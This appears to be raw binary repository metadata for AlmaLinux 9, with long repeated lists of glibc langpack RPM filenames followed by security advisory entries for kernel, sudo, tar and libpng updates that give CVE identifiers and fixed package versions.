glibc-langpack-wo-2.34-168.el9_6.20.x86_64.rpm�v	glibc-langpack-mai-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-pap-2.34-168.el9_6.20.x86_64.rpm�@	glibc-langpack-tpi-2.34-168.el9_6.20.x86_64.rpm�(	glibc-langpack-byn-2.34-168.el9_6.20.x86_64.rpm�O	glibc-langpack-xh-2.34-168.el9_6.20.x86_64.rpm�8	glibc-langpack-dz-2.34-168.el9_6.20.x86_64.rpm�/	libnsl-2.34-168.el9_6.20.i686.rpm�3	glibc-langpack-da-2.34-168.el9_6.20.x86_64.rpm�!	glibc-langpack-bho-2.34-168.el9_6.20.x86_64.rpm�O	glibc-langpack-he-2.34-168.el9_6.20.x86_64.rpm�.	glibc-langpack-sr-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-om-2.34-168.el9_6.20.x86_64.rpm�z	glibc-langpack-mi-2.34-168.el9_6.20.x86_64.rpm�G	glibc-langpack-ur-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-be-2.34-168.el9_6.20.x86_64.rpm�D	glibc-langpack-ug-2.34-168.el9_6.20.x86_64.rpm�~	glibc-langpack-ml-2.34-168.el9_6.20.x86_64.rpm�1	glibc-langpack-sv-2.34-168.el9_6.20.x86_64.rpm�$	glibc-langpack-bo-2.34-168.el9_6.20.x86_64.rpm�i	glibc-langpack-ku-2.34-168.el9_6.20.x86_64.rpm�R	glibc-langpack-yue-2.34-168.el9_6.20.x86_64.rpm�\	glibc-langpack-is-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ro-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-af-2.34-168.el9_6.20.x86_64.rpm�5	glibc-langpack-tcy-2.34-168.el9_6.20.x86_64.rpm�h	glibc-langpack-ks-2.34-168.el9_6.20.x86_64.rpm�S	glibc-langpack-hr-2.34-168.el9_6.20.x86_64.rpm�6	glibc-langpack-te-2.34-168.el9_6.20.x86_64.rpm�&	glibc-langpack-shs-2.34-168.el9_6.20.x86_64.rpm�M	glibc-langpack-wal-2.34-168.el9_6.20.x86_64.rpm�}	glibc-langpack-mk-2.34-168.el9_6.20.x86_64.rpm�-	glibc-gconv-extra-2.34-168.el9_6.20.x86_64.rpm�N	glibc-langpack-hak-2.34-168.el9_6.20.x86_64.rpm�c	glibc-langpack-kl-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-as-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nb-2.34-168.el9_6.20.x86_64.rpm�d	glibc-langpack-km-2.34-168.el9_6.20.x86_64.rpm�I	glibc-langpack-ve-2.34-168.el9_6.20.x86_64.rpm�B	glibc-langpack-fil-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-mnw-2.34-168.el9_6.20.x86_64.rpm�)	glibc-langpack-sk-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nan-2.34-168.el9_6.20.x86_64.rpm�J	glibc-langpack-vi-2.34-168.el9_6.20.x86_64.rpm�_	glibc-langpack-ja-2.34-168.el9_6.20.x86_64.rpm�<	glibc-langpack-es-2.34-168.el9_6.20.x86_64.rpm� 	glibc-langpack-bhb-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-rw-2.34-168.el9_6.20.x86_64.rpm�*	glibc-langpack-ce-2.34-168.el9_6.20.x86_64.rpm�'	glibc-langpack-bs-2.34-168.el9_6.20.x86_64.rpm�u	glibc-langpack-mag-2.34-168.el9_6.20.x86_64.rpm�<	glibc-langpack-tk-2.34-168.el9_6.20.x86_64.rpm�e	glibc-langpack-kn-2.34-168.el9_6.20.x86_64.rpm�)	glibc-langpack-ca-2.34-168.el9_6.20.x86_64.rpm�p	glibc-langpack-ln-2.34-168.el9_6.20.x86_64.rpm�U	glibc-langpack-ht-2.34-168.el9_6.20.x86_64.rpm�*	glibc-langpack-sl-2.34-168.el9_6.20.x86_64.rpm�s	glibc-langpack-lv-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-pt-2.34-168.el9_6.20.x86_64.rpm�-	glibc-langpack-sq-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-mni-2.34-168.el9_6.20.x86_64.rpm�W	nscd-2.34-168.el9_6.20.x86_64.rpm�6	glibc-langpack-dsb-2.34-168.el9_6.20.x86_64.rpm�!	glibc-langpack-sc-2.34-168.el9_6.20.x86_64.rpm�W	glibc-langpack-hy-2.34-168.el9_6.20.x86_64.rpm�T	glibc-langpack-hsb-2.34-168.el9_6.20.x86_64.rpm�%	glibc-langpack-br-2.34-168.el9_6.20.x86_64.rpm�		glibc-langpack-ne-2.34-168.el9_6.20.x86_64.rpm�]	glibc-langpack-it-2.34-168.el9_6.20.x86_64.rpm�K	glibc-langpack-wa-2.34-168.el9_6.20.x86_64.rpm�{	glibc-langpack-miq-2.34-168.el9_6.20.x86_64.rpm�B	glibc-langpack-ts-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-os-2.34-168.el9_6.20.x86_64.rpm�E	glibc-langpack-fur-2.34-168.el9_6.20.x86_64.rpm�m	glibc-langpack-lg-2.34-168.el9_6.20.x86_64.rpm�T	glibc-langpack-zh-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nso-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ber-2.34-168.el9_6.20.x86_64.rpm�b	glibc-langpack-kk-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ms-2.34-168.el9_6.20.x86_64.rpm�C	glibc-langpack-tt-2.34-168.el9_6.20.x86_64.rpm�U	glibc-langpack-zu-2.34-168.el9_6.20.x86_64.rpm�P	glibc-langpack-hi-2.34-168.el9_6.20.x86_64.rpm�y	glibc-langpack-mhr-2.34-168.el9_6.20.x86_64.rpm�
	glibc-langpack-nn-2.34-168.el9_6.20.x86_64.rpm�.	glibc-langpack-crh-2.34-168.el9_6.20.x86_64.rpm�7	glibc-langpack-dv-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-az-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-am-2.34-168.el9_6.20.x86_64.rpm�;	glibc-langpack-tig-2.34-168.el9_6.20.x86_64.rpm�:	glibc-langpack-ti-2.34-168.el9_6.20.x86_64.rpm�[	glibc-langpack-ik-2.34-168.el9_6.20.x86_64.rpm�H	glibc-langpack-uz-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-agr-2.34-168.el9_6.20.x86_64.rpm�f	glibc-langpack-ko-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-an-2.34-168.el9_6.20.x86_64.rpm�F	glibc-langpack-unm-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-quz-2.34-168.el9_6.20.x86_64.rpm�r	glibc-langpack-lt-2.34-168.el9_6.20.x86_64.rpm�>	glibc-langpack-eu-2.34-168.el9_6.20.x86_64.rpm�Q	glibc-langpack-yo-2.34-168.el9_6.20.x86_64.rpm�&	glibc-langpack-brx-2.34-168.el9_6.20.x86_64.rpm�-	glibc-langpack-cmn-2.34-168.el9_6.20.x86_64.rpm�S	glibc-langpack-yuw-2.34-168.el9_6.20.x86_64.rpm�,	glibc-2.34-168.el9_6.20.i686.rpm�X	glibc-langpack-ia-2.34-168.el9_6.20.x86_64.rpm�>	glibc-langpack-tn-2.34-168.el9_6.20.x86_64.rpm�g	glibc-langpack-kok-2.34-168.el9_6.20.x86_64.rpm�L	glibc-langpack-wae-2.34-168.el9_6.20.x86_64.rpm�A	glibc-langpack-tr-2.34-168.el9_6.20.x86_64.rpm�k	glibc-langpack-ky-2.34-168.el9_6.20.x86_64.rpm�`	glibc-langpack-ka-2.34-168.el9_6.20.x86_64.rpm�1	glibc-langpack-cv-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ar-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-bg-2.34-168.el9_6.20.x86_64.rpm�,	glibc-langpack-so-2.34-168.el9_6.20.x86_64.rpm�l	glibc-langpack-lb-2.34-168.el9_6.20.x86_64.rpm�$	glibc-langpack-sgs-2.34-168.el9_6.20.x86_64.rpm�9	glibc-langpack-el-2.34-168.el9_6.20.x86_64.rpm�/	libnsl-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-pa-2.34-168.el9_6.20.x86_64.rpm�/	glibc-langpack-ss-2.34-168.el9_6.20.x86_64.rpm�o	glibc-langpack-lij-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-my-2.34-168.el9_6.20.x86_64.rpm�8	glibc-langpack-th-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-sah-2.34-168.el9_6.20.x86_64.rpm�K	glibc-langpack-gu-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-anp-2.34-168.el9_6.20.x86_64.rpm�R	glibc-langpack-hne-2.34-168.el9_6.20.x86_64.rpm�|	glibc-langpack-mjw-2.34-168.el9_6.20.x86_64.rpm�
	glibc-langpack-nhn-2.34-168.el9_6.20.x86_64.rpm�?	glibc-langpack-to-2.34-168.el9_6.20.x86_64.rpm� 	glibc-langpack-sat-2.34-168.el9_6.20.x86_64.rpm�"	glibc-langpack-sd-2.34-168.el9_6.20.x86_64.rpm�A	glibc-langpack-fi-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-mt-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nr-2.34-168.el9_6.20.x86_64.rpm�x	glibc-langpack-mg-2.34-168.el9_6.20.x86_64.rpm�+	glibc-langpack-sm-2.34-168.el9_6.20.x86_64.rpm�9	glibc-langpack-the-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-raj-2.34-168.el9_6.20.x86_64.rpm�?	glibc-langpack-fa-2.34-168.el9_6.20.x86_64.rpm�n	glibc-langpack-li-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-oc-2.34-168.el9_6.20.x86_64.rpm�Z	glibc-langpack-ig-2.34-168.el9_6.20.x86_64.rpm�0	glibc-langpack-csb-2.34-168.el9_6.20.x86_64.rpm�%	glibc-langpack-shn-2.34-168.el9_6.20.x86_64.rpm�3	glibc-langpack-szl-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ayc-2.34-168.el9_6.20.x86_64.rpm�	glibc-common-2.34-168.el9_6.20.x86_64.rpm�5	glibc-langpack-doi-2.34-168.el9_6.20.x86_64.rpm�=	glibc-langpack-et-2.34-168.el9_6.20.x86_64.rpm�P�	glibc-all-langpacks-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ps-2.34-168.el9_6.20.x86_64.rpm�J	glibc-langpack-gl-2.34-168.el9_6.20.x86_64.rpm�=	glibc-langpack-tl-2.34-168.el9_6.20.x86_64.rpm�M	glibc-langpack-ha-2.34-168.el9_6.20.x86_64.rpm�2	glibc-langpack-sw-2.34-168.el9_6.20.x86_64.rpm�F	glibc-langpack-fy-2.34-168.el9_6.20.x86_64.rpm�j	glibc-langpack-kw-2.34-168.el9_6.20.x86_64.rpm�7	glibc-langpack-tg-2.34-168.el9_6.20.x86_64.rpm�"	glibc-langpack-bi-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-mn-2.34-168.el9_6.20.x86_64.rpm�2	glibc-langpack-cy-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nds-2.34-168.el9_6.20.x86_64.rpm�Y	glibc-langpack-id-2.34-168.el9_6.20.x86_64.rpm�4	glibc-langpack-de-2.34-168.el9_6.20.x86_64.rpm�^	glibc-langpack-iu-2.34-168.el9_6.20.x86_64.rpm�t	glibc-langpack-lzh-2.34-168.el9_6.20.x86_64.rpm�/	glibc-langpack-cs-2.34-168.el9_6.20.x86_64.rpm�P	glibc-langpack-yi-2.34-168.el9_6.20.x86_64.rpm�'	glibc-langpack-si-2.34-168.el9_6.20.x86_64.rpm�;	glibc-langpack-eo-2.34-168.el9_6.20.x86_64.rpm�+	glibc-langpack-chr-2.34-168.el9_6.20.x86_64.rpm�,	glibc-langpack-ckb-2.34-168.el9_6.20.x86_64.rpm�q	glibc-langpack-lo-2.34-168.el9_6.20.x86_64.rpm�,	glibc-2.34-168.el9_6.20.x86_64.rpm�V	glibc-minimal-langpack-2.34-168.el9_6.20.x86_64.rpm�H	glibc-langpack-gd-2.34-168.el9_6.20.x86_64.rpm�E	glibc-langpack-uk-2.34-168.el9_6.20.x86_64.rpm�#	glibc-langpack-se-2.34-168.el9_6.20.x86_64.rpm�Q	glibc-langpack-hif-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-aa-2.34-168.el9_6.20.x86_64.rpm�a	glibc-langpack-kab-2.34-168.el9_6.20.x86_64.rpm�#	glibc-langpack-bn-2.34-168.el9_6.20.x86_64.rpm�V	glibc-langpack-hu-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ak-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-or-2.34-168.el9_6.20.x86_64.rpm�w	glibc-langpack-mfe-2.34-168.el9_6.20.x86_64.rpm�@	glibc-langpack-ff-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-bem-2.34-168.el9_6.20.x86_64.rpm�4	glibc-langpack-ta-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ast-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-mr-2.34-168.el9_6.20.x86_64.rpm�G	glibc-langpack-ga-2.34-168.el9_6.20.x86_64.rpm�0	glibc-langpack-st-2.34-168.el9_6.20.x86_64.rpm�L	glibc-langpack-gv-2.34-168.el9_6.20.x86_64.rpm�I	glibc-langpack-gez-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-niu-2.34-168.el9_6.20.x86_64.rpm�(	glibc-langpack-sid-2.34-168.el9_6.20.x86_64.rpm�C	glibc-langpack-fo-2.34-168.el9_6.20.x86_64.rpm�-	glibc-gconv-extra-2.34-168.el9_6.20.i686.rpm�	glibc-langpack-ru-2.34-168.el9_6.20.x86_64.rpm�D	glibc-langpack-fr-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-pl-2.34-168.el9_6.20.x86_64.rpm�:	glibc-langpack-en-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nl-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-sa-2.34-168.el9_6.20.x86_64.rpm�N	glibc-langpack-wo-2.34-168.el9_6.20.x86_64.rpm�v	glibc-langpack-mai-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-pap-2.34-168.el9_6.20.x86_64.rpm�@	glibc-langpack-tpi-2.34-168.el9_6.20.x86_64.rpm�(	glibc-langpack-byn-2.34-168.el9_6.20.x86_64.rpm�O	glibc-langpack-xh-2.34-168.el9_6.20.x86_64.rpm�8	glibc-langpack-dz-2.34-168.el9_6.20.x86_64.rpm�/	libnsl-2.34-168.el9_6.20.i686.rpm�3	glibc-langpack-da-2.34-168.el9_6.20.x86_64.rpm�!	glibc-langpack-bho-2.34-168.el9_6.20.x86_64.rpm�O	glibc-langpack-he-2.34-168.el9_6.20.x86_64.rpm�.	glibc-langpack-sr-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-om-2.34-168.el9_6.20.x86_64.rpm�z	glibc-langpack-mi-2.34-168.el9_6.20.x86_64.rpm�G	glibc-langpack-ur-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-be-2.34-168.el9_6.20.x86_64.rpm�D	glibc-langpack-ug-2.34-168.el9_6.20.x86_64.rpm�~	glibc-langpack-ml-2.34-168.el9_6.20.x86_64.rpm�1	glibc-langpack-sv-2.34-168.el9_6.20.x86_64.rpm�$	glibc-langpack-bo-2.34-168.el9_6.20.x86_64.rpm�i	glibc-langpack-ku-2.34-168.el9_6.20.x86_64.rpm�R	glibc-langpack-yue-2.34-168.el9_6.20.x86_64.rpm�\	glibc-langpack-is-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ro-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-af-2.34-168.el9_6.20.x86_64.rpm�5	glibc-langpack-tcy-2.34-168.el9_6.20.x86_64.rpm�h	glibc-langpack-ks-2.34-168.el9_6.20.x86_64.rpm�S	glibc-langpack-hr-2.34-168.el9_6.20.x86_64.rpm�6	glibc-langpack-te-2.34-168.el9_6.20.x86_64.rpm�&	glibc-langpack-shs-2.34-168.el9_6.20.x86_64.rpm�M	glibc-langpack-wal-2.34-168.el9_6.20.x86_64.rpm�}	glibc-langpack-mk-2.34-168.el9_6.20.x86_64.rpm�-	glibc-gconv-extra-2.34-168.el9_6.20.x86_64.rpm�N	glibc-langpack-hak-2.34-168.el9_6.20.x86_64.rpm�c	glibc-langpack-kl-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-as-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nb-2.34-168.el9_6.20.x86_64.rpm�d	glibc-langpack-km-2.34-168.el9_6.20.x86_64.rpm�I	glibc-langpack-ve-2.34-168.el9_6.20.x86_64.rpm�B	glibc-langpack-fil-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-mnw-2.34-168.el9_6.20.x86_64.rpm�)	glibc-langpack-sk-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nan-2.34-168.el9_6.20.x86_64.rpm�J	glibc-langpack-vi-2.34-168.el9_6.20.x86_64.rpm�_	glibc-langpack-ja-2.34-168.el9_6.20.x86_64.rpm�<	glibc-langpack-es-2.34-168.el9_6.20.x86_64.rpm� 	glibc-langpack-bhb-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-rw-2.34-168.el9_6.20.x86_64.rpm�*	glibc-langpack-ce-2.34-168.el9_6.20.x86_64.rpm�'	glibc-langpack-bs-2.34-168.el9_6.20.x86_64.rpm�u	glibc-langpack-mag-2.34-168.el9_6.20.x86_64.rpm�<	glibc-langpack-tk-2.34-168.el9_6.20.x86_64.rpm�e	glibc-langpack-kn-2.34-168.el9_6.20.x86_64.rpm�)	glibc-langpack-ca-2.34-168.el9_6.20.x86_64.rpm�p	glibc-langpack-ln-2.34-168.el9_6.20.x86_64.rpm�U	glibc-langpack-ht-2.34-168.el9_6.20.x86_64.rpm�*	glibc-langpack-sl-2.34-168.el9_6.20.x86_64.rpm�s	glibc-langpack-lv-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-pt-2.34-168.el9_6.20.x86_64.rpm�-	glibc-langpack-sq-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-mni-2.34-168.el9_6.20.x86_64.rpm�W	nscd-2.34-168.el9_6.20.x86_64.rpm�6	glibc-langpack-dsb-2.34-168.el9_6.20.x86_64.rpm�!	glibc-langpack-sc-2.34-168.el9_6.20.x86_64.rpm�W	glibc-langpack-hy-2.34-168.el9_6.20.x86_64.rpm�T	glibc-langpack-hsb-2.34-168.el9_6.20.x86_64.rpm�%	glibc-langpack-br-2.34-168.el9_6.20.x86_64.rpm�		glibc-langpack-ne-2.34-168.el9_6.20.x86_64.rpm�]	glibc-langpack-it-2.34-168.el9_6.20.x86_64.rpm�K	glibc-langpack-wa-2.34-168.el9_6.20.x86_64.rpm�{	glibc-langpack-miq-2.34-168.el9_6.20.x86_64.rpm�B	glibc-langpack-ts-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-os-2.34-168.el9_6.20.x86_64.rpm�E	glibc-langpack-fur-2.34-168.el9_6.20.x86_64.rpm�m	glibc-langpack-lg-2.34-168.el9_6.20.x86_64.rpm�T	glibc-langpack-zh-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nso-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ber-2.34-168.el9_6.20.x86_64.rpm�b	glibc-langpack-kk-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ms-2.34-168.el9_6.20.x86_64.rpm�C	glibc-langpack-tt-2.34-168.el9_6.20.x86_64.rpm�U	glibc-langpack-zu-2.34-168.el9_6.20.x86_64.rpm�P	glibc-langpack-hi-2.34-168.el9_6.20.x86_64.rpm�y	glibc-langpack-mhr-2.34-168.el9_6.20.x86_64.rpm�
	glibc-langpack-nn-2.34-168.el9_6.20.x86_64.rpm�.	glibc-langpack-crh-2.34-168.el9_6.20.x86_64.rpm�7	glibc-langpack-dv-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-az-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-am-2.34-168.el9_6.20.x86_64.rpm�;	glibc-langpack-tig-2.34-168.el9_6.20.x86_64.rpm�:	glibc-langpack-ti-2.34-168.el9_6.20.x86_64.rpm�[	glibc-langpack-ik-2.34-168.el9_6.20.x86_64.rpm�H	glibc-langpack-uz-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-agr-2.34-168.el9_6.20.x86_64.rpm�f	glibc-langpack-ko-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-an-2.34-168.el9_6.20.x86_64.rpm�F	glibc-langpack-unm-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-quz-2.34-168.el9_6.20.x86_64.rpm�r	glibc-langpack-lt-2.34-168.el9_6.20.x86_64.rpm�>	glibc-langpack-eu-2.34-168.el9_6.20.x86_64.rpm�Q	glibc-langpack-yo-2.34-168.el9_6.20.x86_64.rpm�&	glibc-langpack-brx-2.34-168.el9_6.20.x86_64.rpm�-	glibc-langpack-cmn-2.34-168.el9_6.20.x86_64.rpm�S	glibc-langpack-yuw-2.34-168.el9_6.20.x86_64.rpm�,	glibc-2.34-168.el9_6.20.i686.rpm�X	glibc-langpack-ia-2.34-168.el9_6.20.x86_64.rpm�>	glibc-langpack-tn-2.34-168.el9_6.20.x86_64.rpm�g	glibc-langpack-kok-2.34-168.el9_6.20.x86_64.rpm�L	glibc-langpack-wae-2.34-168.el9_6.20.x86_64.rpm�A	glibc-langpack-tr-2.34-168.el9_6.20.x86_64.rpm�k	glibc-langpack-ky-2.34-168.el9_6.20.x86_64.rpm�`	glibc-langpack-ka-2.34-168.el9_6.20.x86_64.rpm�1	glibc-langpack-cv-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ar-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-bg-2.34-168.el9_6.20.x86_64.rpm�,	glibc-langpack-so-2.34-168.el9_6.20.x86_64.rpm�l	glibc-langpack-lb-2.34-168.el9_6.20.x86_64.rpm�$	glibc-langpack-sgs-2.34-168.el9_6.20.x86_64.rpm�9	glibc-langpack-el-2.34-168.el9_6.20.x86_64.rpm�/	libnsl-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-pa-2.34-168.el9_6.20.x86_64.rpm�/	glibc-langpack-ss-2.34-168.el9_6.20.x86_64.rpm�o	glibc-langpack-lij-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-my-2.34-168.el9_6.20.x86_64.rpm�8	glibc-langpack-th-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-sah-2.34-168.el9_6.20.x86_64.rpm�K	glibc-langpack-gu-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-anp-2.34-168.el9_6.20.x86_64.rpm�R	glibc-langpack-hne-2.34-168.el9_6.20.x86_64.rpm�|	glibc-langpack-mjw-2.34-168.el9_6.20.x86_64.rpm�
	glibc-langpack-nhn-2.34-168.el9_6.20.x86_64.rpm�?	glibc-langpack-to-2.34-168.el9_6.20.x86_64.rpm� 	glibc-langpack-sat-2.34-168.el9_6.20.x86_64.rpm�"	glibc-langpack-sd-2.34-168.el9_6.20.x86_64.rpm�A	glibc-langpack-fi-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-mt-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-nr-2.34-168.el9_6.20.x86_64.rpm�x	glibc-langpack-mg-2.34-168.el9_6.20.x86_64.rpm�+	glibc-langpack-sm-2.34-168.el9_6.20.x86_64.rpm�9	glibc-langpack-the-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-raj-2.34-168.el9_6.20.x86_64.rpm�?	glibc-langpack-fa-2.34-168.el9_6.20.x86_64.rpm�n	glibc-langpack-li-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-oc-2.34-168.el9_6.20.x86_64.rpm�Z	glibc-langpack-ig-2.34-168.el9_6.20.x86_64.rpm�0	glibc-langpack-csb-2.34-168.el9_6.20.x86_64.rpm�%	glibc-langpack-shn-2.34-168.el9_6.20.x86_64.rpm�3	glibc-langpack-szl-2.34-168.el9_6.20.x86_64.rpm�	glibc-langpack-ayc-2.34-168.el9_6.20.x86_64.rpm�	glibc-common-2.34-168.el9_6.20.x86_64.rpm�5	glibc-langpack-doi-2.34-168.el9_6.20.x86_64.rpm�=	glibc-langpack-et-2.34-168.el9_6.20.x86_64.rpm��a�g
�$��KBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&���	https://access.redhat.com/errata/RHSA-2025:9880RHSA-2025:9880RHSA-2025:9880https://access.redhat.com/security/cve/CVE-2023-52933CVE-2023-52933CVE-2023-52933https://bugzilla.redhat.com/23554762355476https://errata.almalinux.org/9/ALSA-2025-9880.htmlALSA-2025:9880ALSA-2025:9880 Wkernel-debug-uki-virt-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-debug-modules-extra-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-abi-stablelists-5.14.0-570.24.1.el9_6.noarch.rpmWkernel-debug-core-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-debug-modules-core-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-modules-extra-5.14.0-570.24.1.el9_6.x86_64.rpm!Wkernel-modules-core-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-modules-5.14.0-570.24.1.el9_6.x86_64.rpm"Wkernel-uki-virt-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-tools-libs-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-tools-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-core-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-debug-5.14.0-570.24.1.el9_6.x86_64.rpm%Wkernel-uki-virt-addons-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-debug-modules-5.14.0-570.24.1.el9_6.x86_64.rpm Wkernel-debug-uki-virt-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-debug-modules-extra-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-abi-stablelists-5.14.0-570.24.1.el9_6.noarch.rpmWkernel-debug-core-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-debug-modules-core-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-modules-extra-5.14.0-570.24.1.el9_6.x86_64.rpm!Wkernel-modules-core-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-modules-5.14.0-570.24.1.el9_6.x86_64.rpm"Wkernel-uki-virt-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-tools-libs-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-tools-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-core-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-debug-5.14.0-570.24.1.el9_6.x86_64.rpm%Wkernel-uki-virt-addons-5.14.0-570.24.1.el9_6.x86_64.rpmWkernel-debug-modules-5.14.0-570.24.1.el9_6.x86_64.rpm���h
�%��jsecurityImportant: sudo security update&'���shttps://access.redhat.com/errata/RHSA-2025:9978RHSA-2025:9978RHSA-2025:9978https://access.redhat.com/security/cve/CVE-2025-32462CVE-2025-32462CVE-2025-32462https://bugzilla.redhat.com/23746922374692https://errata.almalinux.org/9/ALSA-2025-9978.htmlALSA-2025:9978ALSA-2025:9978�S�sudo-1.9.5p2-10.el9_6.1.x86_64.rpm�S�sudo-1.9.5p2-10.el9_6.1.x86_64.rpm��z�i
��.��lsecurityModerate: tar security update� ��~�bhttps://access.redhat.com/errata/RHSA-2026:0067RHSA-2026:0067RHSA-2026:0067https://access.redhat.com/security/cve/CVE-2025-45582CVE-2025-45582CVE-2025-45582https://bugzilla.redhat.com/23795922379592https://errata.almalinux.org/9/ALSA-2026-0067.htmlALSA-2026:0067ALSA-2026:0067��(tar-1.34-9.el9_7.x86_64.rpm��(tar-1.34-9.el9_7.x86_64.rpm�˘�n�j
�&��oBsecurityImportant: libpng security update� '��`�https://access.redhat.com/errata/RHSA-2026:0238RHSA-2026:0238RHSA-2026:0238https://access.redhat.com/security/cve/CVE-2025-64720CVE-2025-64720CVE-2025-64720https://access.redhat.com/security/cve/CVE-2025-65018CVE-2025-65018CVE-2025-65018https://access.redhat.com/security/cve/CVE-2025-66293CVE-2025-66293CVE-2025-66293https://bugzilla.redhat.com/24169042416904https://bugzilla.redhat.com/24169072416907https://bugzilla.redhat.com/24187112418711https://errata.almalinux.org/9/ALSA-2026-0238.htmlALSA-2026:0238ALSA-2026:0238�,�libpng-1.6.37-12.el9_7.1.x86_64.rpm�,�libpng-1.6.37-12.el9_7.1.i686.rpm�,�libpng-1.6.37-12.el9_7.1.x86_64.rpm�,�libpng-1.6.37-12.el9_7.1.i686.rpm���U�k
